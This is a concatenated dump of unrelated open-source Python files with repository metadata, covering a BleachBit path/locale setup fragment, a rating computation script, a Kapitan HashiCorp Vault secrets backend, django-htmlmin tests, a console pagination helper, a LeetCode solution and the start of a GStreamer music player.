elif sys.platform == 'win32':
system_cleaners_dir = os.path.join(bleachbit_exe_path, 'share\\cleaners\\')
elif sys.platform[:6] == 'netbsd':
system_cleaners_dir = '/usr/pkg/share/bleachbit/cleaners'
else:
system_cleaners_dir = None
print 'warning: unknown system cleaners directory for platform ', sys.platform
# local cleaners directory (for running from source tree)
local_cleaners_dir = os.path.normpath(
os.path.join(bleachbit_exe_path, '../cleaners'))
# application icon
__icons = ('/usr/share/pixmaps/bleachbit.png', # Linux
os.path.join(bleachbit_exe_path, 'share\\bleachbit.png'), # Windows
'/usr/pkg/share/pixmaps/bleachbit.png', # NetBSD
os.path.normpath(os.path.join(bleachbit_exe_path, '../bleachbit.png'))) # local
appicon_path = None
for __icon in __icons:
if os.path.exists(__icon):
appicon_path = __icon
# locale directory
if os.path.exists("./locale/"):
# local locale (personal)
locale_dir = os.path.abspath("./locale/")
else:
# system-wide installed locale
if sys.platform.startswith('linux'):
locale_dir = "/usr/share/locale/"
elif sys.platform == 'win32':
locale_dir = os.path.join(bleachbit_exe_path, 'share\\locale\\')
elif sys.platform[:6] == 'netbsd':
locale_dir = "/usr/pkg/share/locale/"
# launcher
launcher_path = '/usr/share/applications/bleachbit.desktop'
if 'posix' == os.name:
autostart_path = os.path.expanduser(
'~/.config/autostart/bleachbit.desktop')
#
# setup environment
#
# Windows XP doesn't define localappdata, but Windows Vista and 7 do
def environ(varname, csidl):
try:
os.environ[varname] = shell.SHGetSpecialFolderPath(None, csidl)
except:
traceback.print_exc()
        msg = 'Error setting environment variable "%s": %s' % (
            varname, str(sys.exc_info()[1]))
import GuiBasic
GuiBasic.message_dialog(None, msg)
if 'nt' == os.name:
environ('localappdata', shellcon.CSIDL_LOCAL_APPDATA)
environ('documents', shellcon.CSIDL_DESKTOPDIRECTORY)
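# Illustrative note (added; not in the original module): Windows XP does not
# define %localappdata%, so the two environ() calls above derive it (and
# %documents%) from the shell's CSIDL paths, keeping later
# os.path.expandvars() lookups consistent across Windows versions.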
#
# gettext
#
try:
user_locale = locale.getdefaultlocale()[0]
except:
print 'warning: error getting locale: %s' % str(sys.exc_info()[1])
user_locale = None
if None == user_locale:
user_locale = 'C'
print "warning: No default locale found. Assuming '%s'" % user_locale
if 'win32' == sys.platform:
os.environ['LANG'] = user_locale
try:
if not os.path.exists(locale_dir):
raise RuntimeError('translations not installed')
t = gettext.translation('bleachbit', locale_dir)
_ = t.ugettext
except:
def _(msg):
"""Dummy replacement for ugettext"""
return msg
try:
ungettext = t.ungettext
except:
def ungettext(singular, plural, n):
"""Dummy replacement for Unicode, plural gettext"""
if 1 == n:
return singular
return plural
#
# pgettext
#
# Code released in the Public Domain. You can do whatever you want with this package.
# Originally written by Pierre Métras <[email protected]> for the OLPC XO laptop.
#
# Original source: http://dev.laptop.org/git/activities/clock/plain/pgettext.py
# pgettext(msgctxt, msgid) from gettext is not supported in Python implementation < v2.6.
# http://bugs.python.org/issue2504
# Meanwhile we get official support, we have to simulate it.
# See http://www.gnu.org/software/gettext/manual/gettext.html#Ambiguities for
# more information about pgettext.
# The separator between message context and message id.This value is the same as
# the one used in gettext.h, so PO files should be still valid when Python gettext
# module will include pgettext() function.
GETTEXT_CONTEXT_GLUE = "\004"
def pgettext(msgctxt, msgid):
"""A custom implementation of GNU pgettext().
"""
    if msgctxt is not None and msgctxt != "":
translation = _(msgctxt + GETTEXT_CONTEXT_GLUE + msgid)
if translation.startswith(msgctxt + GETTEXT_CONTEXT_GLUE):
return msgid
else:
return translation
else:
return _(msgid)
# Map our pgettext() custom function to _p()
_p = lambda msgctxt, msgid: pgettext(msgctxt, msgid)
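# Illustrative example (added; not part of the original module): with the
# dummy _() above, _("month name\x04May") comes back unchanged, the
# startswith() test matches, and pgettext() falls back to the bare msgid.
def _pgettext_demo():
    return pgettext("month name", "May")  # -> "May" when untranslated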
#
# URLs
#
base_url = "http://bleachbit.sourceforge.net"
help_contents_url = "%s/link.php?version=%s&lang=%s&target=help" \
% (base_url, APP_VERSION, user_locale)
release_notes_url = "%s/link.php?version=%s&lang=%s&target=release_notes" \
% (base_url, APP_VERSION, user_locale)
update_check_url = "%s/communicate.php" % base_url
| gpl-3.0 | 3,201,493,757,747,861,000 | 29.898785 | 91 | 0.666798 | false |
lucabaldini/rating02 | dump_rating.py | 1 | 7983 | #!/usr/bin/env python
#
# Copyright (C) 2019, Luca Baldini.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import numpy
import matplotlib.pyplot as plt
from rating import *
import _rating2020 as _rating
def filter_db_pers(db_pers):
"""This is filtering a DocentDatabse object removing all the persons with
less than 2 products (which automatically get 0 rating points).
Note that, for the thing to work, this has to be called after a loop
over the db where the product statistics has been calculated and
updated.
"""
db = DocentDatabase()
for pers in db_pers:
if pers.num_products >= 2:
db.append(pers)
else:
print('Filtering out %s (%d products)...' %\
(pers.full_name, pers.num_products))
return db
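# Illustrative note (added; attribute names mirror those used below): the
# filter only works after a first pass has populated num_products, e.g.
#   for pers in db_pers:
#       prods = db_prod.select(author_full_name=pers.full_name, valid=True)
#       pers.num_products = len(prods)
#   db_pers = filter_db_pers(db_pers)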
def dump_rating(file_path, collab_threshold=30):
"""Dump the full rating information.
"""
# Load the underlying database objects.
db_prod = load_db_prod()
db_pers = load_db_pers()
sub_areas = sorted(Product.SUB_AREA_DICT.keys())
# First loop over the products, where we mark the invalid as such, and
# we manually set the journal impact factor where necessary.
print('Post-processing product list...')
for prod in db_prod:
# Mark invalids.
if prod.row_index in _rating.INVALID:
print('Marking product @ row %d for %s as invalid...' %\
(prod.row_index, prod.author_surname))
prod.valid = False
# Set impact factor if necessary.
if prod.pub_type == '1.1 Articolo in rivista' and \
prod.impact_factor() is None and \
prod.journal in _rating.IMPACT_FACTOR_DICT.keys():
journal = prod.journal
impact_factor = _rating.IMPACT_FACTOR_DICT[journal]
print('Setting IF for %s @ row %d to %.3f...' %\
(journal, prod.row_index, impact_factor))
prod.set_impact_factor(impact_factor)
# Break out the docent database into the three sub-areas.
# Mind at this points the sub-lists still contain the persons with less
# than 2 products.
print('Populating sub-areas...')
pers_dict = {}
for sub_area in sub_areas:
pers_dict[sub_area] = db_pers.select(sub_area=sub_area)
# Actual loop to calculate the rating points and the basic product
# statistics for all the docents.
print('Calculating rating points...')
for sub_area in sub_areas:
for pers in pers_dict[sub_area]:
prods = db_prod.select(author_full_name=pers.full_name, valid=True)
pers.num_products = len(prods)
if len(prods) == 0:
continue
rating = sum(prod.rating_points(sub_area, _rating.RATING_DICT) for\
prod in prods)
# Take any leave of absence into account.
if pers.full_name in _rating.LOA_SCALING_DICT:
scale = _rating.LOA_SCALING_DICT[pers.full_name]
print('Scaling rating for %s by %.3f' % (pers.full_name, scale))
rating *= scale
num_authors = numpy.array([prod.num_authors for prod in prods])
# Update the Docent object.
pers.rating = rating
# Note that we're casting all the numpy scalars to native Python
# types for the excel interface module to be able to write them in
# the output file.
pers.num_collab_products = \
int((num_authors > collab_threshold).sum())
pers.min_num_authors = int(num_authors.min())
pers.median_num_authors = float(numpy.median(num_authors))
pers.max_num_authors = int(num_authors.max())
# Now that we have the basic product statistics we can filter out
# the docents with less than 2 products.
for sub_area in sub_areas:
        print('Filtering docent database for sub-area %s...' % sub_area)
pers_dict[sub_area] = filter_db_pers(pers_dict[sub_area])
# Sort the docents and dump the excel file.
print('Sorting docents within sub-areas...')
table = ExcelTableDump()
col_names = ['Ranking', 'Nome', 'Punti rating', 'Numero prodotti',
'Numero prodotti con > %d autori' % collab_threshold,
'# autori min', '# autori medio', '# autori max']
for sub_area in sub_areas:
rows = []
pers_dict[sub_area].sort(reverse=True)
print('Ratings points for sub-area %s:' % sub_area)
for i, pers in enumerate(pers_dict[sub_area]):
pers.ranking = i
print('%2i -- %s: %f rating points.' %\
(i, pers.full_name, pers.rating))
rows.append([i, pers.full_name, pers.rating, pers.num_products,
pers.num_collab_products, pers.min_num_authors,
pers.median_num_authors, pers.max_num_authors])
table.add_worksheet('Sottoarea %s' % sub_area, col_names, rows)
table.write(file_path)
# Do some plotting.
for sub_area in sub_areas:
plt.figure('Sottoarea %s' % sub_area, figsize=(12, 8))
num_persons = len(pers_dict[sub_area])
num_points = _rating.RATING_POINTS_PER_DOCENT * num_persons
plt.title('Sottoarea %s (%d docenti, %.3f punti)' %\
(sub_area, num_persons, num_points), size=18)
ranking = numpy.array([pers.ranking for pers in pers_dict[sub_area]])
rating = numpy.array([pers.rating for pers in pers_dict[sub_area]])
plt.plot(ranking, rating, 'o')
plt.xlabel('Ranking')
plt.ylabel('Rating points')
for pers in pers_dict[sub_area]:
x = pers.ranking
y = pers.rating
name = pers.full_name.split()[0].title()
if name in ['Di', 'Del', 'Prada']:
name += ' %s' % pers.full_name.split()[1].title()
txt = '%s, %d (%d) <%.1f>' %\
(name, pers.num_products, pers.num_collab_products,
pers.median_num_authors)
plt.text(x, y, txt, rotation=20., ha='left', va='bottom')
leg = 'Cognome, # prod (# prod > %d auth) <median # auth>' %\
(collab_threshold)
plt.text(0.5, 0.9, leg, transform=plt.gca().transAxes, size=12)
# Calculate the quantiles.
print('Calculating quantiles for sub-area %s...' % sub_area)
quantiles = numpy.floor(numpy.linspace(0.22, 0.75, 3) * num_persons)
quantiles += 0.5
for q in quantiles:
plt.axvline(q, ls='dashed')
quantiles = numpy.concatenate(([-0.5], quantiles, [num_persons + 0.5]))
psum = 0
for i, (q1, q2) in enumerate(zip(quantiles[:-1], quantiles[1:])):
mask = (ranking > q1) * (ranking < q2)
r = ranking[mask]
n = len(r)
frac = float(n) / num_persons
p = 4 - i
psum += p * n
print('%d docents with %d points...' % (n, p))
plt.text(r.mean(), 2, '%d x %d = %d (%.1f %%)' %\
(p, n, n * p, 100. * frac), ha='center')
print('Total rating points for area %s: %d' % (sub_area, psum))
plt.savefig('rating02_2020_%s.png' % sub_area)
plt.show()
if __name__ == '__main__':
dump_rating('rating02_2020.xls')
| gpl-3.0 | 4,332,046,184,173,600,300 | 41.68984 | 80 | 0.591131 | false |
ademariag/kapitan | kapitan/refs/secrets/vaultkv.py | 2 | 9041 | # Copyright 2019 The Kapitan Authors
# SPDX-FileCopyrightText: 2020 The Kapitan Authors <[email protected]>
#
# SPDX-License-Identifier: Apache-2.0
"hashicorp vault kv secrets module"
import base64
import logging
import os
from binascii import Error as b_error
from sys import exit
from kapitan import cached
from kapitan.errors import KapitanError
from kapitan.refs.base import RefError
from kapitan.refs.base64 import Base64Ref, Base64RefBackend
import hvac
from hvac.exceptions import Forbidden, InvalidPath
logger = logging.getLogger(__name__)
class VaultError(KapitanError):
"""Generic vault errors"""
pass
def get_env(parameter):
"""
The following variables need to be exported to the environment or defined in inventory.
* VAULT_ADDR: url for vault
* VAULT_SKIP_VERIFY=true: if set, do not verify presented TLS certificate before communicating with Vault server.
* VAULT_CLIENT_KEY: path to an unencrypted PEM-encoded private key matching the client certificate
* VAULT_CLIENT_CERT: path to a PEM-encoded client certificate for TLS authentication to the Vault server
* VAULT_CACERT: path to a PEM-encoded CA cert file to use to verify the Vault server TLS certificate
* VAULT_CAPATH: path to a directory of PEM-encoded CA cert files to verify the Vault server TLS certificate
* VAULT_NAMESPACE: specify the Vault Namespace, if you have one
Following keys are used to creates a new hvac client instance.
:param url: Base URL for the Vault instance being addressed.
:type url: str
:param cert: Certificates for use in requests sent to the Vault instance. This should be a tuple with the
certificate and then key.
:type cert: tuple
:param verify: Either a boolean to indicate whether TLS verification should be performed when sending requests to Vault,
or a string pointing at the CA bundle to use for verification.
See http://docs.python-requests.org/en/master/user/advanced/#ssl-cert-verification.
:type verify: Union[bool,str]
:param namespace: Optional Vault Namespace.
:type namespace: str
"""
client_parameters = {}
client_parameters["url"] = parameter.get("VAULT_ADDR", os.getenv("VAULT_ADDR", default=""))
client_parameters["namespace"] = parameter.get(
"VAULT_NAMESPACE", os.getenv("VAULT_NAMESPACE", default="")
)
# VERIFY VAULT SERVER TLS CERTIFICATE
skip_verify = str(parameter.get("VAULT_SKIP_VERIFY", os.getenv("VAULT_SKIP_VERIFY", default="")))
if skip_verify.lower() == "false":
cert = parameter.get("VAULT_CACERT", os.getenv("VAULT_CACERT", default=""))
if not cert:
cert_path = parameter.get("VAULT_CAPATH", os.getenv("VAULT_CAPATH", default=""))
if not cert_path:
raise Exception("Neither VAULT_CACERT nor VAULT_CAPATH specified")
client_parameters["verify"] = cert_path
else:
client_parameters["verify"] = cert
else:
client_parameters["verify"] = False
# CLIENT CERTIFICATE FOR TLS AUTHENTICATION
client_key = parameter.get("VAULT_CLIENT_KEY", os.getenv("VAULT_CLIENT_KEY", default=""))
client_cert = parameter.get("VAULT_CLIENT_CERT", os.getenv("VAULT_CLIENT_CERT", default=""))
if client_key != "" and client_cert != "":
client_parameters["cert"] = (client_cert, client_key)
return client_parameters
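# Hedged example (added for illustration; the address and CA path are
# hypothetical): building client parameters for a TLS-verified server.
def _get_env_demo():
    return get_env({
        "VAULT_ADDR": "https://vault.example.com:8200",
        "VAULT_SKIP_VERIFY": "false",
        "VAULT_CACERT": "/etc/ssl/certs/vault-ca.pem",
    })  # -> {'url': ..., 'namespace': '', 'verify': '/etc/ssl/certs/vault-ca.pem'}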
def vault_obj(vault_parameters):
"""
vault_parameters: necessary parameters to authenticate & get value from vault, provided by inventory
e.g.:
auth: userpass
VAULT_ADDR: http://127.0.0.1:8200
VAULT_SKIP_VERIFY: false
Authenticate client to server and return client object
"""
env = get_env(vault_parameters)
client = hvac.Client(**{k: v for k, v in env.items() if k != "auth"})
auth_type = vault_parameters["auth"]
    # GET TOKEN EITHER FROM ENVIRONMENT OR FILE
if auth_type in ["token", "github"]:
env["token"] = os.getenv("VAULT_TOKEN")
if not env["token"]:
try:
token_file = os.path.join(os.path.expanduser("~"), ".vault-token")
with open(token_file, "r") as f:
env["token"] = f.read()
if env["token"] == "":
raise VaultError("{file} is empty".format(file=token_file))
except IOError:
raise VaultError("Cannot read file {file}".format(file=token_file))
# DIFFERENT LOGIN METHOD BASED ON AUTHENTICATION TYPE
if auth_type == "token":
client.token = env["token"]
elif auth_type == "ldap":
client.auth.ldap.login(username=os.getenv("VAULT_USERNAME"), password=os.getenv("VAULT_PASSWORD"))
elif auth_type == "userpass":
client.auth_userpass(username=os.getenv("VAULT_USERNAME"), password=os.getenv("VAULT_PASSWORD"))
elif auth_type == "approle":
client.auth_approle(os.getenv("VAULT_ROLE_ID"), secret_id=os.getenv("VAULT_SECRET_ID"))
elif auth_type == "github":
client.auth.github.login(token=env["token"])
else:
raise "Authentication type '{auth}' not supported".format(auth=auth_type)
if client.is_authenticated():
return client
else:
raise VaultError("Vault Authentication Error, Environment Variables defined?")
class VaultSecret(Base64Ref):
"""
Hashicorp Vault support for KV Secret Engine
"""
def __init__(self, data, vault_params, **kwargs):
"""
Set vault parameter and encoding of data
"""
self.data = data
self.vault_params = vault_params
super().__init__(self.data, **kwargs)
self.type_name = "vaultkv"
@classmethod
def from_params(cls, data, ref_params):
"""
Return new VaultSecret from data and ref_params: target_name
parameters will be grabbed from the inventory via target_name
"""
try:
target_name = ref_params.kwargs["target_name"]
if target_name is None:
raise ValueError("target_name not set")
target_inv = cached.inv["nodes"].get(target_name, None)
if target_inv is None:
raise ValueError("target_inv not set")
ref_params.kwargs["vault_params"] = target_inv["parameters"]["kapitan"]["secrets"]["vaultkv"]
return cls(data, **ref_params.kwargs)
except KeyError:
raise RefError("Could not create VaultSecret: vaultkv parameters missing")
@classmethod
def from_path(cls, ref_full_path, **kwargs):
return super().from_path(ref_full_path, encrypt=False, **kwargs)
def reveal(self):
"""
Returns decrypted data
"""
# can't use super().reveal() as we want bytes
try:
self.data = base64.b64decode(self.data, validate=True)
except b_error:
exit("non-alphabet characters in the data")
return self._decrypt()
def _decrypt(self):
"""
Authenticate with Vault server & returns value of the key from secret
:returns: secret in plain text
"""
try:
client = vault_obj(self.vault_params)
# token will comprise of two parts path_in_vault:key
data = self.data.decode("utf-8").rstrip().split(":")
return_data = ""
if self.vault_params.get("engine") == "kv":
response = client.secrets.kv.v1.read_secret(
path=data[0], mount_point=self.vault_params.get("mount", "secret")
)
return_data = response["data"][data[1]]
else:
response = client.secrets.kv.v2.read_secret_version(
path=data[0], mount_point=self.vault_params.get("mount", "secret")
)
return_data = response["data"]["data"][data[1]]
client.adapter.close()
except Forbidden:
raise VaultError(
"Permission Denied. "
+ "make sure the token is authorised to access {path} on Vault".format(path=data[0])
)
except InvalidPath:
raise VaultError("{path} does not exist on Vault secret".format(path=data[0]))
if return_data == "":
raise VaultError("'{key}' doesn't exist on '{path}'".format(key=data[1], path=data[0]))
return return_data
def dump(self):
"""
Returns dict with keys/values to be serialised.
"""
return {
"data": self.data,
"encoding": self.encoding,
"type": self.type_name,
"vault_params": self.vault_params,
}
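# Illustrative note (added; the names are hypothetical): a ref payload has
# the form "path_in_vault:key". The split performed by _decrypt() above:
def _payload_split_demo():
    path, key = b"app/creds:password".decode("utf-8").rstrip().split(":")
    return path, key  # ("app/creds", "password")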
class VaultBackend(Base64RefBackend):
def __init__(self, path, ref_type=VaultSecret, **ref_kwargs):
"init VaultBackend ref backend type"
super().__init__(path, ref_type, **ref_kwargs)
self.type_name = "vaultkv"
| apache-2.0 | 3,772,391,026,941,438,000 | 38.480349 | 128 | 0.619843 | false |
Zowie/django-htmlmin | htmlmin/tests/test_minify.py | 1 | 7473 | # -*- coding: utf-8 -*-
# Copyright 2013 django-htmlmin authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import six
import codecs
import unittest
from htmlmin.minify import html_minify
from os.path import abspath, dirname, join
resources_path = lambda *paths: abspath(join(dirname(__file__),
'resources', *paths))
class TestMinify(unittest.TestCase):
def _normal_and_minified(self, filename):
html_file = resources_path('%s.html' % filename)
html_file_minified = resources_path('%s_minified.html' % filename)
html = open(html_file).read()
f_minified = codecs.open(html_file_minified, encoding='utf-8')
return html, f_minified.read().strip('\n')
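    # Illustrative note (added): e.g. _normal_and_minified('with_pre') loads
    # resources/with_pre.html and resources/with_pre_minified.html and
    # returns their contents as (html, minified).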
def test_complete_html_should_be_minified(self):
html, minified = self._normal_and_minified('with_menu')
self.assertEqual(minified, html_minify(html))
def test_html_with_blank_lines_should_be_minify(self):
html, minified = self._normal_and_minified('with_blank_lines')
self.assertEqual(minified, html_minify(html))
def test_should_not_minify_content_from_script_tag(self):
html, minified = self._normal_and_minified('with_javascript')
self.assertEqual(minified, html_minify(html))
def test_should_not_convert_entity_the_content_of_script_tag(self):
html, minified = self._normal_and_minified('with_html_content_in_javascript')
self.assertEqual(minified, html_minify(html))
def test_should_not_minify_content_from_pre_tag(self):
html, minified = self._normal_and_minified('with_pre')
self.assertEqual(minified, html_minify(html))
def test_should_not_convert_entity_the_content_of_pre_tag(self):
html, minified = self._normal_and_minified('with_html_content_in_pre')
self.assertEqual(minified, html_minify(html))
def test_should_not_minify_content_from_textarea(self):
html, minified = self._normal_and_minified('with_textarea')
result = html_minify(html)
self.assertEqual(minified, result)
def test_should_convert_to_entities_the_content_of_textarea_tag(self):
html, minified = self._normal_and_minified('with_html_content_in_textarea')
result = html_minify(html)
self.assertEqual(minified, result)
def test_should_not_convert_entities_within_textarea_tag(self):
html, minified = self._normal_and_minified('with_entities_in_textarea')
result = html_minify(html)
self.assertEqual(minified, result)
def test_should_not_drop_blank_lines_from_the_begin_of_a_textarea(self):
t = 'with_textarea_with_blank_lines'
html, minified = self._normal_and_minified(t)
result = html_minify(html)
self.assertEqual(minified, result)
def test_html_should_be_minified(self):
html = "<html> <body>some text here</body> </html>"
minified = "<html><head></head><body>some text here</body></html>"
self.assertEqual(minified, html_minify(html))
def test_minify_function_should_return_a_unicode_object(self):
html = "<html> <body>some text here</body> </html>"
minified = html_minify(html)
if six.PY2:
self.assertEqual(unicode, type(minified))
else:
self.assertEqual(str, type(minified))
def test_minify_should_respect_encoding(self):
html, minified = self._normal_and_minified('blogpost')
self.assertEqual(minified, html_minify(html))
def test_minify_should_not_prepend_doctype_when_its_not_present(self):
html, minified = self._normal_and_minified('without_doctype')
self.assertEqual(minified, html_minify(html))
def test_minify_should_keep_doctype_when_its_present(self):
html, minified = self._normal_and_minified('with_old_doctype')
self.assertEqual(minified, html_minify(html))
def test_should_exclude_comments_by_default(self):
html, minified = self._normal_and_minified('with_comments_to_exclude')
self.assertEqual(minified, html_minify(html))
def test_should_be_able_to_not_exclude_comments(self):
html, minified = self._normal_and_minified('with_comments')
self.assertEqual(minified, html_minify(html, ignore_comments=False))
def test_should_be_able_to_exclude_multiline_comments(self):
t = 'with_multiple_line_comments'
html, minified = self._normal_and_minified(t)
self.assertEqual(minified, html_minify(html))
def test_should_be_able_to_exclude_multiple_comments_on_a_page(self):
html, minified = self._normal_and_minified('with_multiple_comments')
self.assertEqual(minified, html_minify(html))
def test_should_not_exclude_conditional_comments(self):
html, minified = self._normal_and_minified('with_conditional_comments')
self.assertEqual(minified, html_minify(html))
def test_should_not_rm_multiline_conditional_comments(self):
html, minified = self._normal_and_minified('with_multiple_line_conditional_comments')
self.assertEqual(minified, html_minify(html))
def test_should_touch_attributes_only_on_tags(self):
html = '<html>\n <body>I selected you!</body>\n </html>'
minified = '<html><head></head><body>I selected you!</body></html>'
self.assertEqual(minified, html_minify(html))
def test_should_be_able_to_minify_html5_tags(self):
html, minified = self._normal_and_minified('html5')
self.assertEqual(minified, html_minify(html))
def test_should_transform_multiple_spaces_in_one(self):
html, minified = self._normal_and_minified('multiple_spaces')
self.assertEqual(minified, html_minify(html))
def test_should_convert_line_break_to_whitespace(self):
html, minified = self._normal_and_minified('line_break')
self.assertEqual(minified, html_minify(html))
def test_should_keep_new_line_as_space_when_minifying(self):
html = '<html><body>Click <a href="#">here</a>\nto see ' +\
'more</body></html>'
minified = '<html><head></head><body>Click <a href="#">here</a> to ' +\
'see more</body></html>'
got_html = html_minify(html)
self.assertEqual(minified, got_html)
def test_should_not_produce_two_spaces_in_new_line(self):
html = '<html><body>Click <a href="#">here</a> \nto see more' +\
'</body></html>'
minified = '<html><head></head><body>Click <a href="#">here' + \
'</a> to see more</body></html>'
got_html = html_minify(html)
self.assertEqual(minified, got_html)
def test_should_keep_non_breaking_space(self):
        html = '<html><head></head><body>This is separated&nbsp;by a non breaking space.</body></html>'
        minified = u'<html><head></head><body>This is separated\xa0by a non breaking space.</body></html>'
got_html = html_minify(html)
self.assertEqual(minified, got_html)
def test_non_ascii(self):
html, minified = self._normal_and_minified('non_ascii')
self.assertEqual(minified, html_minify(html))
def test_non_ascii_in_excluded_element(self):
html, minified = self._normal_and_minified(
'non_ascii_in_excluded_element'
)
self.assertEqual(minified, html_minify(html))
| bsd-2-clause | -8,056,160,050,232,105,000 | 42.447674 | 106 | 0.655961 | false |
zenieldanaku/pygpj | func/core/viz.py | 1 | 6108 | # coding=UTF-8
# Viz.py
import os
from math import ceil
from func.core.lang import t, probar_input
def PrepPrint(lista):
imp = ''
lineas = []
for elemento in lista:
imp += str(elemento)+', '
if len(imp) > 75:
lineas.append(imp)
imp = ''
lineas.append(imp)
imprimir = '\n'.join(lineas).rstrip(', ')+'.'
return imprimir
def subselector (prompt,lista,vueltas=1,dos_col=False):
from func.core.config import advt as advertencias
items = []
pool = vueltas
    copia = lista * 1  # working copy
for vuelta in range(vueltas):
if vuelta == 0:
paginado = []
for i in range(len(copia)):
if copia[i][0:1] == '\n':
copia[i] = copia[i].strip('\n')
paginado.append('\n'+str(i)+': '+str(t(copia[i])))
else:
paginado.append(str(i)+': '+str(t(copia[i])))
if dos_col == False:
paginar (10,paginado)
else:
paginar_dos_columnas(10,paginado)
while pool > 0:
item = ''
while item == '':
item = input ('\n'+prompt+': ').capitalize()
if item.isnumeric():
item = int(item)
if item in items:
print (t('Ya ha realizado esa selección, intente nuevamente'))
item = ''
elif item not in range(len(copia)):
print(t('La selección es incorrecta, intente nuevamente'))
item = ''
else:
if advertencias == True:
print (t('Ha elegido ')+t(copia[item]),end = '. ')
items.append(item)
pool -= 1
else:
item = probar_input (item,copia)
if item == '':
print (t('La selección es incorrecta, intente nuevamente')+'\n')
elif copia.index(item) in items:
print (t('Ya ha realizado esa selección, intente nuevamente'))
item = ''
else:
if advertencias == True:
print (t('Ha elegido ')+t(item),end = '. ')
items.append(copia.index(item))
pool -= 1
if advertencias == True:
if not input(t('¿Estas seguro? ')+t('[S / N]')+' ').strip().lower().startswith(t('s')):
pool += 1
del items[-1]
if vueltas == 1:
return items[0]
else:
return items
def barra (caracteristicas, alineamiento, raza):
    '''Generates the top preview bar.'''
FUE = str(caracteristicas['FUE']['Punt'])
DES = str(caracteristicas['DES']['Punt'])
CON = str(caracteristicas['CON']['Punt'])
INT = str(caracteristicas['INT']['Punt'])
SAB = str(caracteristicas['SAB']['Punt'])
CAR = str(caracteristicas['CAR']['Punt'])
barra = ' | '.join([raza,' '.join([t('FUE'),FUE,t('DES'),DES,t('CON'),CON,
t('INT'),INT,t('SAB'),SAB,t('CAR'),CAR]),
'Al '+alineamiento])
return barra
def paginar (tam_pag,lineas):
    '''Simple helper that prints lines of text one page at a time.'''
for i in range(len(lineas)):
if i == 0:
print()
print (lineas[i])
if lineas[i] != lineas[-1]:
if (i+1) % tam_pag == 0:
                input ('\n[Press Enter to continue]\n')
#os.system(['clear','cls'][os.name == 'nt'])
def a_dos_columnas(items):
    '''Splits a list of items into two columns so they fit on a single page.'''
c1 = []
c2 = []
for i in range(len(items)):
if i < len(items)/2:
c1.append(items[i])
else:
c2.append(items[i])
if len(c1) > len(c2):
for i in range(len(c1)-len(c2)):
c2.append('')
lineas = []
for i in range(len(c1)):
if len(c1[i]) > 32:
lineas.append(c1[i] +'\t'+ c2[i])
elif len(c1[i]) > 23:
lineas.append(c1[i] +'\t'*2+ c2[i])
elif len(c1[i]) > 15:
lineas.append(c1[i] +'\t'*3+ c2[i])
elif len(c1[i]) > 7:
lineas.append(c1[i] +'\t'*4+ c2[i])
else:
lineas.append(c1[i] +'\t'*5+ c2[i])
return lineas
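# Illustrative example (added; not part of the original module): splitting
# six short items into two tab-aligned columns.
def _a_dos_columnas_demo():
    return a_dos_columnas(['one', 'two', 'three', 'four', 'five', 'six'])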
def paginar_dos_columnas(tam_pag,lista):
pags = ceil((len(lista)/2)/tam_pag)
c1 = [[] for i in range(pags)]
c2 = [[] for i in range(pags)]
j = 0
for i in range(len(lista)):
if i == tam_pag*2*(j+1):
j += 1
if i < tam_pag+(tam_pag*2)*j:
c1[j].append(lista[i])
else:
c2[j].append(lista[i])
if len(c1[-1]) > len(c2[-1]):
for i in range(len(c1[-1])-len(c2[-1])):
c2[-1].append('')
lineas = []
for i in range(pags):
for j in range(len(c1[i])):
if len(c1[i][j]) > 31:
lineas.append(c1[i][j] +'\t'+ c2[i][j])
elif len(c1[i][j]) > 23:
lineas.append(c1[i][j] +'\t'*2+ c2[i][j])
elif len(c1[i][j]) > 15:
lineas.append(c1[i][j] +'\t'*3+ c2[i][j])
elif len(c1[i][j]) > 7:
lineas.append(c1[i][j] +'\t'*4+ c2[i][j])
else:
lineas.append(c1[i][j] +'\t'*5+ c2[i][j])
for i in range(len(lineas)):
if i == 0:
print()
print (lineas[i])
if lineas[i] != lineas[-1]:
if (i+1) % tam_pag == 0:
                input ('\n[Press Enter to continue]\n')
#os.system(['clear','cls'][os.name == 'nt'])
| mit | 1,342,281,639,521,813,200 | 32.659091 | 103 | 0.430984 | false |
vivaxy/algorithms | python/problems/most_common_word.py | 1 | 1131 | """
https://leetcode.com/problems/most-common-word/
https://leetcode.com/submissions/detail/150204402/
"""
class Solution:
def mostCommonWord(self, paragraph, banned):
"""
:type paragraph: str
:type banned: List[str]
:rtype: str
"""
wordAcc = dict()
for word in paragraph.lower().replace(',', '').replace('.', '').replace('!', '').replace('?', '').replace('\'', '').replace(';', '').split(' '):
if word not in banned:
if word in wordAcc:
wordAcc[word] += 1
else:
wordAcc[word] = 1
maxCount = 0
ans = ''
for word in wordAcc:
count = wordAcc[word]
if count > maxCount:
maxCount = count
ans = word
return ans
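# Hedged alternative sketch (added; not part of the original solution): the
# same punctuation stripping and counting expressed with re and Counter.
import re
from collections import Counter

def most_common_word_alt(paragraph, banned):
    banned_set = set(banned)
    words = re.findall(r"[a-z]+", paragraph.lower())
    counts = Counter(w for w in words if w not in banned_set)
    return counts.most_common(1)[0][0]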
import unittest
class Test(unittest.TestCase):
def test(self):
solution = Solution()
self.assertEqual(solution.mostCommonWord(
'Bob hit a ball, the hit BALL flew far after it was hit.', ['hit']), 'ball')
if __name__ == '__main__':
unittest.main()
| mit | -3,210,401,791,503,412,000 | 24.704545 | 152 | 0.505747 | false |
hanxi/pyfm | pyfm.py | 1 | 2766 | #!/usr/bin/python
# coding: utf-8
import sys
import os
import threading
import time
import random
import json
import signal
import gst
# Base player class
class MusicBase:
def __init__(self):
self.app_name = 'console_fm'
self.appPath = os.path.realpath(sys.path[0])
jsonStr = open(self.appPath+'/music2type.json').read()
self.music2type = json.loads(jsonStr)
noneType = []
for k in self.music2type.keys():
if len(self.music2type[k])==0:
noneType.append(k)
for v in noneType:
del self.music2type[v]
self.player = gst.element_factory_make('playbin', 'player')
self.event = threading.Event()
self.playing = False
next(self)
bus = self.player.get_bus()
bus.add_signal_watch()
bus.connect('message', self.on_message)
    # gst message handling
def on_message(self, bus, message):
